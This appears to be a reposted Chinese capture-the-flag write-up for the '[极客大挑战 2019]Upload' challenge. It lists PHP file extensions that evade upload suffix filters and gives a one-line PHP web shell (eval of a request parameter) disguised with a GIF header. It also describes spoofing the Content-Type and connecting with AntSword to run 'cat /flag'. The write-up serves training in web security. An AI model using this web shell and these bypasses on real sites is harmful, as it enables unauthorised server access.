首页 > 其他 > 详细

[极客大挑战 2019]Upload

时间:2020-02-02 22:00:49      阅读:611      评论:0      收藏:0      [点我收藏+]

0x00 知识点

一个常规上传题目,知识点全都来自前几天写的文章:

https://www.cnblogs.com/wangtanzhi/p/12243206.html

1:某些情况下绕过后缀名检测:

php,php3,php4,php5,phtml.pht
2:常用一句话:

GIF89a? <script language="php">eval($_REQUEST[shell])</script>

php5适用
3:文件类型绕过

改成image/jpeg
技术分享图片

0x01 解题

做如下修改:
技术分享图片

蚁剑连接:
http://3915f5e8-a730-4ca3-80c1-572b9cff8776.node3.buuoj.cn/upload/1.phtml
访问:
技术分享图片

文件太多了 我们直接在终端cat /flag

右键 虚拟终端:

技术分享图片

[极客大挑战 2019]Upload

原文:https://www.cnblogs.com/wangtanzhi/p/12253607.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!